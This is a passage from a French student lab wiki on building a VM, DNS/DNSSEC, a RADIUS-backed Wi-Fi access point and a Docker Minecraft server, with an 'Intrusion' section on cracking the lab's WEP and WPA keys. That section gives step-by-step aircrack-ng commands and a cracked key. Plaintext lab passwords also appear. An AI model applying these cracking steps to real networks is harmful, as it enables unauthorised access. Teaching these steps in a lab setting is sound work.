@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz.net ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60284</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60284"/>
				<updated>2022-11-29T00:05:46Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sommaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Vérification&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5_detestable.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
